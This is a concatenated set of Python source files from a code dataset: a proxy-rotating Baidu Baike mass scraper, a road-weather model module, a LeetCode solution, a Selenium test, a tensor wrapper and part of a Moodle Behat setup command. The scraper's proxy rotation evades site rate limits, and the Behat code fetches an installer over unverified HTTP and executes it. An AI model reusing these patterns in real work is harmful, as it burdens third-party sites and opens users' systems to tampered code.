filename = os.path.join(PATH, 'sys', 'timeout_urls')\n with codecs.open(filename, mode='a', encoding='utf-8') as f:\n url_list = [item+'\\n' for item in url_list]\n f.writelines(url_list)\n\n def parse_html(self, url,filecount,proxy):\n\n content_json_dict = {}\n http_proxy = 'http://%s'%proxy\n proxy_hanlder = urllib2.ProxyHandler({'http':http_proxy})\n opener = urllib2.build_opener(proxy_hanlder)\n urllib2.install_opener(opener)\n try:\n html = urllib2.urlopen(url).read()\n except:\n self.timeout_url_list.append(url)\n if len(self.timeout_url_list) > 500:\n self.write_timeout_url(self.timeout_url_list)\n self.timeout_url_list[:] = []\n return\n\n soup = BeautifulSoup(html)\n header_str = soup.find('div', class_='lemmaTitleH1')\n if not header_str:\n self.timeout_url_list.append(url)\n if len(self.timeout_url_list) > 500:\n self.write_timeout_url(self.timeout_url_list)\n self.timeout_url_list[:] = []\n # print 'url not match pattern:%s'%url\n return\n content_json_dict['header'] = header_str.text\n content_json_dict['url'] = url\n para_level_list = soup.find_all('div', class_='para')\n para_str_list =[para.text for para in para_level_list]\n content_str = \"\".join(para_str_list)\n content_json_dict['content'] = content_str\n json_obj = simplejson.dumps(content_json_dict)\n filename = os.path.join(PATH, 'out', filecount)\n with codecs.open('%s'%filename, mode='wb', encoding='utf-8')as f:\n f.write(json_obj)\n # parse_html()\n\n def read_with_proxy(self, section_count):\n filename = os.path.join(PATH, 'sys', 'xici_proxy')\n with open(filename) as f:\n proxy_ip_list = f.readlines()\n proxy_ip_list = [item.strip() for item in proxy_ip_list]\n proxy_count = len(proxy_ip_list)\n # start = time.time()\n threads = []\n url_pattern = \"http://baike.baidu.com/view/%s.htm\"\n\n thread_count = 200\n threads_per_proxy = int(ceil(thread_count/float(proxy_count)))\n\n for i in range(1+thread_count*section_count, thread_count*(section_count+1)+1):\n url = url_pattern%str(i)\n proxy_point = (i-thread_count*section_count)/threads_per_proxy\n ip_port = proxy_ip_list[proxy_point]\n threads.append(gevent.spawn(self.parse_html, url, str(i), ip_port))\n gevent.joinall(threads,timeout=90)\n # end = time.time()\n # print \"elapsed time : %d\" %(end-start)\n\n def request_timeout_url(self, section_count, timeout_url_list):\n filename = os.path.join(PATH, 'sys', 'xici_proxy')\n with open(filename) as f:\n proxy_ip_list = f.readlines()\n proxy_ip_list = [item.strip() for item in proxy_ip_list]\n proxy_count = len(proxy_ip_list)\n threads = []\n # url_pattern = \"http://baike.baidu.com/view/%s.htm\"\n\n thread_count = 100\n threads_per_proxy = int(ceil(thread_count/float(proxy_count)))\n\n for i in range(thread_count*section_count, thread_count*(section_count+1)):\n # url = url_pattern%str(i)\n try:\n url = timeout_url_list[i]\n except:\n continue\n proxy_point = (i-thread_count*section_count)/threads_per_proxy\n ip_port = proxy_ip_list[proxy_point]\n threads.append(gevent.spawn(self.parse_html, url, str(i), ip_port))\n gevent.joinall(threads,timeout=90)\n\n def baike_content(self):\n url_count = 10000000\n threads_count = 200\n n = url_count/threads_count\n for i in range(n):\n self.read_with_proxy(i)\n time.sleep(random.randint(2,5))\n filename = os.path.join(PATH, 'sys', 'timeout_urls')\n for recheck_count in range(4):\n\n with open(filename) as f:\n timeout_url_list = f.readlines()\n\n temp_timeout_url = os.path.join(PATH, 'sys', 'temp_timeout_urls')\n with codecs.open(temp_timeout_url, mode='wb', 
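[Editor's aside] parse_html above installs a global opener via urllib2.install_opener on every call, which is racy under gevent since all greenlets share it. A hedged Python 3 sketch that scopes the proxy to a single request instead (the timeout value is an assumption):

import urllib.request

def fetch_via_proxy(url, proxy, timeout=30):
    # Build a per-call opener so concurrent fetches cannot
    # clobber each other's proxy settings.
    handler = urllib.request.ProxyHandler({'http': 'http://%s' % proxy})
    opener = urllib.request.build_opener(handler)
    return opener.open(url, timeout=timeout).read()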
encoding='utf-8') as wf:\n wf.writelines(timeout_url_list)\n #清空timeout_urls文件\n with open(filename, mode='wb')as rf:\n pass\n\n timeout_url_count = len(timeout_url_list)\n timeout_threads_count = 100\n m = timeout_url_count/timeout_threads_count\n for j in range(m):\n self.request_timeout_url(j, timeout_url_list)\nif __name__ == \"__main__\":\n baike = BaiKe()\n baike.baike_content()","repo_name":"wanghuafeng/e-business","sub_path":"baidu/baike.py","file_name":"baike.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"84"} +{"seq_id":"11757281973","text":"from metro_module import Metro_module\n\nimport string\nimport time\nimport numpy\n\nimport metro_logger\nimport metro_config\nfrom toolbox import metro_util\nfrom toolbox import metro_date\nfrom toolbox import metro_constant\nfrom data_module import metro_data_collection_output\nfrom data_module import metro_data\nfrom data_module import metro_infdata\n\n_ = metro_util.init_translation('metro_model')\n\n# To call the C function.\nfrom model import macadam\n\nclass Metro_model(Metro_module):\n\n def get_receive_type( self ):\n return Metro_module.DATATYPE_DATA_IN\n\n def get_send_type( self ):\n return Metro_module.DATATYPE_DATA_OUT\n\n def start( self ):\n Metro_module.start(self)\n\n pForecast = self.get_infdata_reference('FORECAST')\n forecast_data = pForecast.get_data_collection()\n pObservation = self.get_infdata_reference('OBSERVATION')\n observation_data = pObservation.get_data_collection()\n pStation = self.get_infdata_reference('STATION')\n station_data = pStation.get_data()\n\n if metro_config.get_value('T_BYPASS_CORE') == False:\n\n self.__send_data_to_metro_core(forecast_data,\n observation_data,\n station_data )\n \n roadcast_data = self.__create_roadcast_collection(forecast_data,\n observation_data,\n station_data)\n else:\n roadcast_data = None\n metro_logger.print_message(\n metro_logger.LOGGER_MSG_INFORMATIVE,\n _(\"Bypassing METRo core, roadcast not created.\"))\n\n pForecast.set_data_collection(forecast_data)\n pObservation.set_data_collection(observation_data)\n pStation.set_data(station_data)\n\n # creer et ajouter infdata\n # Creation and adding infdata\n infdata_roadcast = metro_infdata.Metro_infdata(\n 'ROADCAST', metro_infdata.DATATYPE_METRO_DATA_COLLECTION)\n infdata_roadcast.set_data_collection(roadcast_data)\n self.add_infdata(infdata_roadcast)\n \n \n def stop( self ):\n Metro_module.stop(self)\n\n def __get_nb_timesteps( self, forecast ):\n wf_data = forecast.get_interpolated_data()\n npFT = wf_data.get_matrix_col('Time')\n\n return len(npFT)\n\n\n def __get_observation_lenght( self, observation ):\n obs_data = observation.get_interpolated_data()\n lTime_obs = obs_data.get_matrix_col('Time').tolist()\n return len(lTime_obs) \n\n def __get_observation_delta_t( self, observation ):\n return observation.get_attribute('DELTA_T') \n \n def __send_data_to_metro_core( self, forecast, observation, station ):\n\n wf_data = forecast.get_interpolated_data()\n ro_data = observation.get_interpolated_data()\n cs_data = station\n\n # Start time from model is the last observation\n sStart_time = metro_config.get_value('DATA_ATTRIBUTE_LAST_OBSERVATION')\n fStart_time = metro_date.parse_date_string(sStart_time)\n\n\n iModel_start_y = metro_date.get_year(fStart_time)\n sMessage = _(\"year: [%s]\") % (iModel_start_y)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n iModel_start_m = 
metro_date.get_month(fStart_time)\n sMessage = _(\"month: [%s]\") % (iModel_start_m)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n iModel_start_d = metro_date.get_day(fStart_time)\n sMessage = _(\"day: [%s]\") % (iModel_start_d)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n iModel_start_h = metro_date.get_hour(fStart_time)\n sMessage = _(\"hour: [%s]\") % (iModel_start_h)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n dStation_header = cs_data.get_header()\n\n # test observation\n dObservation_header = ro_data.get_header()\n lObservation_data = ro_data.get_matrix()\n sMessage = \"Observation_header=\" + str(dObservation_header)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage) \n sMessage = \"Observation_data=\" + str(lObservation_data)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n \n # test forecast\n dForecast_header = wf_data.get_header()\n lForecast_data = wf_data.get_matrix()\n\n sMessage = \"Forecast_header=\" + str(dForecast_header)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage) \n sMessage = \"Forecast_data=\" + str(lForecast_data)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n # start roadlayer MATRIX\n npLayerType = cs_data.get_matrix_col('TYPE')\n lLayerType = npLayerType.astype(numpy.int32).tolist()\n lLayerThick = cs_data.get_matrix_col('THICKNESS').tolist()\n nNbrOfLayer = len(lLayerType)\n\n sMessage = _(\"Number of layer=\") + str(nNbrOfLayer)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n # Append an empty box for the manuel mode\n lLayerType.append(0)\n lLayerThick.append(0.0)\n \n\n sMessage = _(\"roadlayer type=\") + str(lLayerType)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n sMessage = _(\"roadlayer thick=\") + str(lLayerThick)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n # end roadlayer MATRIX\n\n fTime = dStation_header['PRODUCTION_DATE']\n fTimeForecast = dForecast_header['PRODUCTION_DATE']\n sTimeZone = dStation_header['TIME_ZONE']\n sMessage = _(\"timezone=\") + sTimeZone\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n \n fIssue_time = fStart_time\n \n sMessage = _(\"issue time=\") + time.ctime(fIssue_time)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n \n wforiginal = forecast.get_original_data()\n\n ft = wforiginal.get_matrix_col('FORECAST_TIME')\n\n\n ##################################################################\n # Forecast\n # Get the interpolated values.\n wf_interpolated_data = forecast.get_interpolated_data()\n npAT = wf_interpolated_data.get_matrix_col('AT')\n lAT = npAT.tolist()\n lQP = wf_interpolated_data.get_matrix_col('QP').tolist()\n npWS = wf_interpolated_data.get_matrix_col('WS')\n lWS = npWS.tolist()\n npTD = wf_interpolated_data.get_matrix_col('TD') \n lTD = npTD.tolist()\n lAP = wf_interpolated_data.get_matrix_col('AP').tolist()\n lSF = wf_interpolated_data.get_matrix_col('SF').tolist()\n lIR = wf_interpolated_data.get_matrix_col('IR').tolist()\n npFA = wf_interpolated_data.get_matrix_col('FA')\n lFA = npFA.tolist()\n lPI = wf_interpolated_data.get_matrix_col('PI').astype(numpy.int32).tolist()\n lSC = wf_interpolated_data.get_matrix_col('SC').astype(numpy.int32).tolist()\n \n\n # Number of 30 seconds step.\n npFT = wf_interpolated_data.get_matrix_col('Time')\n nNbrTimeSteps = 
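[Editor's aside] The four near-identical year/month/day/hour debug blocks above can be collapsed into one loop; a hedged sketch reusing the module's own helpers (names taken from the imports above):

for label, get in (('year', metro_date.get_year), ('month', metro_date.get_month),
                   ('day', metro_date.get_day), ('hour', metro_date.get_hour)):
    metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,
                               _("%s: [%s]") % (label, get(fStart_time)))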
self.__get_nb_timesteps(forecast)\n lAH = wf_interpolated_data.get_matrix_col('AH').tolist()\n\n # Observation data ###############################################\n ro_interpolated_data = observation.get_interpolated_data()\n lAT_obs = ro_interpolated_data.get_matrix_col('AT').tolist()\n lST_obs = ro_interpolated_data.get_matrix_col('ST').tolist()\n lSST_obs = ro_interpolated_data.get_matrix_col('SST').tolist()\n lTime_obs = ro_interpolated_data.get_matrix_col('Time').tolist()\n # Deep soil value given in command line\n bDeepTemp = metro_config.get_value('DEEP_SOIL_TEMP')\n dDeepTemp = float(metro_config.get_value('DEEP_SOIL_TEMP_VALUE'))\n\n nLenObservation = self.__get_observation_lenght(observation) \n fDeltaTMetroObservation = self.__get_observation_delta_t(observation)\n \n # Concatenate the information to send it to C.\n npSWO1 = observation.get_attribute('SST_VALID_INTERPOLATED')\\\n .astype(numpy.int32)\n npSWO2 = observation.get_attribute('AT_VALID_INTERPOLATED')\\\n .astype(numpy.int32)\n npSWO3 = observation.get_attribute('TD_VALID_INTERPOLATED')\\\n .astype(numpy.int32)\n npSWO4 = observation.get_attribute('WS_VALID_INTERPOLATED')\\\n .astype(numpy.int32)\n npSWO = numpy.zeros(4*metro_constant.nNL)\n # Put all the arrays in one for the fortran code.\n for i in range(0,len(npSWO1)):\n npSWO[4*i] = npSWO1[i]\n npSWO[4*i+1] = npSWO2[i]\n npSWO[4*i+2] = npSWO3[i] \n npSWO[4*i+3] = npSWO4[i] \n lSWO = npSWO.astype(numpy.int32).tolist()\n \n bNoObs = observation.get_attribute('NO_OBS')\n \n sMessage = _( \"------------station config START---------------------\")\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n \n sShort_time_zone = metro_date.get_short_time_zone\\\n (fIssue_time,sTimeZone)\n\n sMessage = _( \"Short time zone = \") + sShort_time_zone\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n tLatlon = dStation_header['COORDINATE']\n fLat = tLatlon[0]\n fLon = tLatlon[1]\n sMessage = _( \"lat,lon: \")+ \"(\" + str(fLat) + \", \" + str(fLon) + \")\"\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n bFlat = cs_data.get_station_type()\n\n dSstDepth = cs_data.get_sst_depth()\n\n sMessage = _( \"SST sensor depth: \") + str(dSstDepth)\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n\n sMessage = _(\"------------station config END---------------------\")\n metro_logger.print_message(metro_logger.LOGGER_MSG_DEBUG,\n sMessage)\n \n bSilent = not metro_config.get_value('INIT_LOGGER_SHELL_DISPLAY')\n\n metro_logger.print_message(metro_logger.LOGGER_MSG_EXECPRIMARY,\n _(\"Start sending data to METRo core\"))\n\n bEchec = []\n\n macadam.Do_Metro(bFlat, fLat, fLon, lLayerThick, \\\n nNbrOfLayer, lLayerType, lAT, lQP, \\\n lWS, lAP, lSF, lIR, \\\n lFA, lPI, lSC, lAT_obs, \\\n lST_obs, lSST_obs, lAH, lTime_obs, \\\n lSWO, bNoObs, fDeltaTMetroObservation, \\\n nLenObservation, nNbrTimeSteps, bSilent, \\\n dSstDepth, bDeepTemp, dDeepTemp)\n bEchec = (macadam.get_echec())[0]\n # Check if the execution of the model was a succes:\n if bEchec != 0:\n sError_message = _(\"Fatal error in METRo physical model.\") \n metro_logger.print_message(metro_logger.LOGGER_MSG_STOP,\n sError_message)\n else:\n metro_logger.print_message(metro_logger.LOGGER_MSG_EXECPRIMARY,\n _(\"End of METRo core\"))\n\n def __create_roadcast_collection( self, forecast, observation, station ):\n \n\n # Creation of the Metro_data object for the roadcast\n lStandard_items = metro_config.get_value( \\\n 
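[Editor's aside] The element-by-element interleaving of the four validity arrays into npSWO above can be expressed with a single column_stack/ravel, which fills position 4*i + k with array k's i-th element. A hedged miniature (the real buffer is pre-zeroed to length 4*nNL, so the result would still need padding):

import numpy as np
a = np.array([1, 0, 1]); b = np.array([0, 0, 1])
c = np.array([1, 1, 1]); d = np.array([0, 1, 0])
flat = np.column_stack([a, b, c, d]).ravel()
assert list(flat) == [1, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0]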
'XML_ROADCAST_PREDICTION_STANDARD_ITEMS')\n lExtended_items = metro_config.get_value( \\\n 'XML_ROADCAST_PREDICTION_EXTENDED_ITEMS') \n lItems = lStandard_items # + lExtended_items\n\n #FFTODO append all lExtended_items to metrodata \n roadcast = metro_data.Metro_data(lItems)\n \n # Extraction of forecast data used to create the roadcasts.\n wf_data = forecast.get_interpolated_data()\n \n #\n # Generate the header of roadcast\n #\n\n # extraction of informations\n sRoadcast_version = \\\n metro_config.get_value('FILE_ROADCAST_CURRENT_VERSION')\n sRoadcast_station = station.get_station_name()\n fRoadcast_production_date = time.time()\n \n \n #\n # Generate the roadcast matrix of data\n #\n\n # Extraction of data used by metro_core in the computation\n iObservation_len = self.__get_observation_lenght(observation)\n fObservation_delta_t = self.__get_observation_delta_t(observation)\n iNb_timesteps = self.__get_nb_timesteps(forecast)\n\n\n # Extraction of roadcast data computed by metro_core\n lRA = (macadam.get_ra())[:iNb_timesteps]\n lSN = (macadam.get_sn())[:iNb_timesteps]\n lRC = (macadam.get_rc())[:iNb_timesteps]\n lST = (macadam.get_rt())[:iNb_timesteps]\n lFV = (macadam.get_fv())[:iNb_timesteps]\n lSF = (macadam.get_sf())[:iNb_timesteps]\n lIR = (macadam.get_ir())[:iNb_timesteps]\n lFC = (macadam.get_fc())[:iNb_timesteps]\n lFG = (macadam.get_g())[:iNb_timesteps]\n lBB = (macadam.get_bb())[:iNb_timesteps]\n lFP = (macadam.get_fp())[:iNb_timesteps]\n lSST = (macadam.get_sst())[:iNb_timesteps]\n\n if metro_config.get_value('TL') == True:\n # Temperature of levels under the ground.\n nNbrVerticalLevel = macadam.get_nbr_levels()\n lDepth = (macadam.get_depth())[:nNbrVerticalLevel]\n lTmpTL = (macadam.get_lt())[:nNbrVerticalLevel*iNb_timesteps]\n lTL = [] \n for i in range(0,iNb_timesteps):\n begin = i * nNbrVerticalLevel\n end = begin + nNbrVerticalLevel\n lTL.append(lTmpTL[begin:end])\n \n # Adding the informations to the header\n roadcast.set_header_value('VERSION',sRoadcast_version)\n roadcast.set_header_value('ROAD_STATION',sRoadcast_station)\n roadcast.set_header_value('PRODUCTION_DATE',fRoadcast_production_date)\n roadcast.set_header_value('LATITUDE', station.get_header()\\\n ['COORDINATE'][0])\n roadcast.set_header_value('LONGITUDE', station.get_header()\\\n ['COORDINATE'][1])\n roadcast.set_header_value('FILETYPE','roadcast')\n\n if metro_config.get_value('TL') == True:\n roadcast.set_header_value('VERTICAL_LEVELS',lDepth)\n \n\n # TODO MT: Le +30 est la pour que l'output soit au bon moment.\n # Il y a eu un probleme dans la conversion entre le C et le fortran\n # qui fait en sorte qu'il y a un decalage d'un indice. 
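[Editor's aside] The French TODO spanning this point translates roughly as: "the +30 is there so the output comes out at the right moment; something went wrong in the C-to-Fortran conversion, causing a one-index offset, and it will have to be fixed." A minimal illustration of the compensation it describes (npRT assumed to hold seconds, 30 s being one model timestep):

import numpy as np
npRT = np.array([0, 30, 60])
npRT = npRT + 30   # shift every roadcast time by one 30 s step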
Il faudra que\n # ce soit corrige.\n npRT = wf_data.get_matrix_col('FORECAST_TIME')[:iNb_timesteps]\n npRT = npRT + 30\n npHH = wf_data.get_matrix_col('Time')[:iNb_timesteps]\n npAT = wf_data.get_matrix_col('AT')[:iNb_timesteps]\n npFA = wf_data.get_matrix_col('FA')[:iNb_timesteps]\n # 3.6 is to convert from m/s to km/h\n npWS = wf_data.get_matrix_col('WS')[:iNb_timesteps]*3.6\n npTD = wf_data.get_matrix_col('TD')[:iNb_timesteps]\n npQP_SN = wf_data.get_matrix_col('SN')[:iNb_timesteps]\n npQP_RA = wf_data.get_matrix_col('RA')[:iNb_timesteps]\n npCC = wf_data.get_matrix_col('CC')[:iNb_timesteps]\n\n\n roadcast.init_matrix(iNb_timesteps, roadcast.get_real_nb_matrix_col())\n\n # Data added to the roadcast matrix\n roadcast.set_matrix_col('RA', lRA)\n roadcast.set_matrix_col('SN', lSN)\n roadcast.set_matrix_col('RC', lRC)\n roadcast.set_matrix_col('ST', lST)\n roadcast.set_matrix_col('ROADCAST_TIME', npRT)\n roadcast.set_matrix_col('HH', npHH)\n roadcast.set_matrix_col('AT', npAT)\n roadcast.set_matrix_col('WS', npWS)\n roadcast.set_matrix_col('TD', npTD)\n roadcast.set_matrix_col('QP-SN', npQP_SN)\n roadcast.set_matrix_col('QP-RA', npQP_RA)\n roadcast.set_matrix_col('IR', lIR)\n roadcast.set_matrix_col('SF', lSF)\n roadcast.set_matrix_col('FV', lFV)\n roadcast.set_matrix_col('FC', lFC)\n roadcast.set_matrix_col('FG', lFG)\n roadcast.set_matrix_col('FA', npFA.tolist())\n roadcast.set_matrix_col('BB', lBB)\n roadcast.set_matrix_col('FP', lFP)\n roadcast.set_matrix_col('CC', npCC)\n roadcast.set_matrix_col('SST', lSST)\n\n if metro_config.get_value('TL') == True:\n roadcast.append_matrix_multiCol('TL', lTL)\n\n \n # Creation of the object Metro_data_collection for the roadcast\n lStandard_attributes = metro_config.get_value( \\\n 'DATA_ATTRIBUTE_ROADCAST_STANDARD')\n lExtended_attributes = metro_config.get_value( \\\n 'DATA_ATTRIBUTE_ROADCAST_EXTENDED') \n lAttributes = lStandard_attributes + lExtended_attributes\n \n roadcast_collection = \\\n metro_data_collection_output.\\\n Metro_data_collection_output(roadcast,lAttributes)\n\n \n # Writing of data needed for the roadcast.\n roadcast_collection.set_attribute('OBSERVATION_LENGTH',\n iObservation_len)\n roadcast_collection.set_attribute('OBSERVATION_DELTAT_T',\n fObservation_delta_t)\n roadcast_collection.set_attribute('FORECAST_NB_TIMESTEPS',\n iNb_timesteps)\n\n return roadcast_collection\n","repo_name":"jacobg0/METRoWin","sub_path":"src/frontend/executable_module/metro_model.py","file_name":"metro_model.py","file_ext":"py","file_size_in_byte":18223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"23704769095","text":"from SelfCreateFunction.List_Node import ListNode\n\nclass Solution(object):\n def getDecimalValue(self, head):\n node_values = \"\"\n while head:\n node_values += str(head.val)\n head = head.next\n return int(node_values, 2)\n\n\nif __name__ == '__main__':\n head_val = [0]\n i_head = ListNode().Create_Node(head_val)\n\n run = Solution()\n print(run.getDecimalValue(i_head))\n","repo_name":"zxz13561/MyLeetcodeNote","sub_path":"All Problems/1290. Convert Binary Number in a Linked List to Integer.py","file_name":"1290. 
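[Editor's aside] getDecimalValue above builds a string of bits and re-parses it with int(..., 2); a hedged arithmetic variant that accumulates while walking the list (same ListNode shape with .val/.next assumed):

def get_decimal_value(head):
    value = 0
    while head:
        value = value * 2 + head.val  # shift left one bit, add the new bit
        head = head.next
    return value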
Convert Binary Number in a Linked List to Integer.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12990375352","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport math\n\ndef sum(x, y):\n return str(x + y)\n\n\ntry: \n link = \"https://suninjuly.github.io/selects1.html\"\n browser = webdriver.Chrome()\n browser.get(link)\n \n fnum = browser.find_element(By.CSS_SELECTOR, \"#num1\")\n snum = browser.find_element(By.CSS_SELECTOR, \"#num2\")\n\n x = int(fnum.text)\n y = int(snum.text)\n z = sum(x, y) # add numbers\n print(x)\n print(y)\n print(z)\n\n browser.find_element(By.TAG_NAME, \"select\").click() # open the dropdown list\n browser.find_element(By.CSS_SELECTOR, (f\"[value='{z}']\")).click() # select the calculated number\n\n\n button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n button.click()\n\nfinally:\n time.sleep(5)\n browser.execute_script(\"document.title='Script executing';alert('Robots at work');\") # execute_script method, show alert\n time.sleep(3)\n browser.quit()\n\n\n\n","repo_name":"vistad/seleniumPython","sub_path":"2_2_3_dropdownAlert.py","file_name":"2_2_3_dropdownAlert.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"16919026291","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\nclass PredictWrapper:\n def __init__(self, fn):\n self.fn = fn\n\n def predict(self, x):\n # Note 1: We need to pass the result to the CPU so that the latent\n # distance informer class can deal with the NumPy array.\n # Note 2: Due to the Keras/PyTorch asymmetry, and the [0] index in\n # self._encoder.predict(\n # streamline[np.newaxis, ])[0]\n # in TractographyLatentSpaceDistanceInformer.compute_distances\n # we need to add yet another axis here: [np.newaxis, ]\n return (\n self.fn(x)\n .cpu()\n .detach()\n .numpy()[\n np.newaxis,\n ]\n )\n","repo_name":"scil-vital/tractolearn","sub_path":"tractolearn/utils/layer_utils.py","file_name":"layer_utils.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"10499782454","text":"import os\nimport urllib.request, urllib.parse, urllib.error\nimport re\nimport logging\nimport gzip\nfrom tempfile import gettempdir\nfrom time import sleep\nfrom ..command import Command\nfrom ..tools import process, ProcessInThread, downloadProcessHook, question, natural_sort_key\n\n\nclass BehatCommand(Command):\n\n _arguments = [\n (\n ['-r', '--run'],\n {\n 'action': 'store_true',\n 'help': 'run the tests'\n }\n ),\n (\n ['-d', '--disable'],\n {\n 'action': 'store_true',\n 'help': 'disable Behat, runs the tests first if --run has been set. Ignored from 2.7.'\n }\n ),\n (\n ['--force'],\n {\n 'action': 'store_true',\n 'help': 'force behat re-init and reset the variables in the config file.'\n }\n ),\n (\n ['-f', '--feature'],\n {\n 'metavar': 'path',\n 'help': 'typically a path to a feature, or an argument understood by behat (see [features]: vendor/bin/behat --help). 
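[Editor's aside] The dropdown test above opens the <select> and clicks the option via a CSS value selector; Selenium also ships a dedicated helper for this, sketched here with the names from the test:

from selenium.webdriver.support.ui import Select

select = Select(browser.find_element(By.TAG_NAME, "select"))
select.select_by_value(z)   # z is the stringified sum computed above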
Automatically convert path to absolute path.'\n }\n ),\n (\n ['-n', '--testname'],\n {\n 'dest': 'testname',\n 'metavar': 'name',\n 'help': 'only execute the feature elements which match part of the given name or regex'\n }\n ),\n (\n ['-t', '--tags'],\n {\n 'metavar': 'tags',\n 'help': 'only execute the features or scenarios with tags matching tag filter expression'\n }\n ),\n (\n ['-j', '--no-javascript'],\n {\n 'action': 'store_true',\n 'dest': 'nojavascript',\n 'help': 'do not start Selenium and ignore Javascript (short for --tags=~@javascript). Cannot be combined with --tags or --testname.'\n }\n ),\n (\n ['-D', '--no-dump'],\n {\n 'action': 'store_false',\n 'dest': 'faildump',\n 'help': 'use the standard command without fancy screenshots or output to a directory'\n }\n ),\n (\n ['-s', '--switch-completely'],\n {\n 'action': 'store_true',\n 'dest': 'switchcompletely',\n 'help': 'force the switch completely setting. This will be automatically enabled for PHP < 5.4. Ignored from 2.7.'\n }\n ),\n (\n ['--selenium'],\n {\n 'default': None,\n 'dest': 'selenium',\n 'help': 'path to the selenium standalone server to use',\n 'metavar': 'jarfile'\n }\n ),\n (\n ['--selenium-download'],\n {\n 'action': 'store_true',\n 'dest': 'seleniumforcedl',\n 'help': 'force the download of the latest Selenium to the cache'\n }\n ),\n (\n ['--selenium-verbose'],\n {\n 'action': 'store_true',\n 'dest': 'seleniumverbose',\n 'help': 'outputs the output from selenium in the same window'\n }\n ),\n (\n ['name'],\n {\n 'default': None,\n 'help': 'name of the instance',\n 'metavar': 'name',\n 'nargs': '?'\n }\n )\n ]\n _description = 'Initialise Behat'\n\n def run(self, args):\n\n # Loading instance\n M = self.Wp.resolve(args.name)\n if not M:\n raise Exception('This is not a Moodle instance')\n\n # Check required version\n if M.branch_compare(25, '<'):\n raise Exception('Behat is only available from Moodle 2.5')\n\n # Check if installed\n if not M.get('installed'):\n raise Exception('This instance needs to be installed first')\n\n # Disable Behat\n if args.disable and not args.run:\n self.disable(M)\n return\n\n # No Javascript\n nojavascript = args.nojavascript\n if not nojavascript and not self.C.get('java') or not os.path.isfile(os.path.abspath(self.C.get('java'))):\n nojavascript = True\n logging.info('Disabling Javascript because Java is required to run Selenium and could not be found.')\n\n # If not composer.phar, install Composer\n if not os.path.isfile(os.path.join(M.get('path'), 'composer.phar')):\n logging.info('Installing Composer')\n cliFile = 'behat_install_composer.php'\n cliPath = os.path.join(M.get('path'), 'behat_install_composer.php')\n (to, headers) = urllib.request.urlretrieve('http://getcomposer.org/installer', cliPath)\n if dict(headers).get('content-encoding') == 'gzip':\n f = gzip.open(cliPath, 'r')\n content = f.read()\n f.close()\n f = open(cliPath, 'w')\n f.write(content)\n f.close()\n M.cli('/' + cliFile, stdout=None, stderr=None)\n os.remove(cliPath)\n M.cli('composer.phar', args='install', stdout=None, stderr=None)\n\n # Download selenium\n seleniumPath = os.path.expanduser(os.path.join(self.C.get('dirs.mdk'), 'selenium.jar'))\n if args.selenium:\n seleniumPath = args.selenium\n elif args.seleniumforcedl or (not nojavascript and not os.path.isfile(seleniumPath)):\n logging.info('Attempting to find a download for Selenium')\n seleniumStorageUrl = 'https://selenium-release.storage.googleapis.com/'\n url = urllib.request.urlopen(seleniumStorageUrl)\n content = 
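[Editor's aside] The Selenium download code around this point picks the newest jar by natural-sorting the matched filenames. A hedged sketch of what a natural_sort_key must do so 2.53.1 outranks 2.9.0 (the real implementation lives in mdk's toolbox module):

import re

def natural_key(s):
    # Split out digit runs and compare them numerically.
    return [int(t) if t.isdigit() else t.lower() for t in re.split(r'(\d+)', s)]

jars = ['2.9/selenium-server-standalone-2.9.0.jar',
        '2.53/selenium-server-standalone-2.53.1.jar']
assert sorted(jars, key=natural_key)[-1].endswith('2.53.1.jar')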
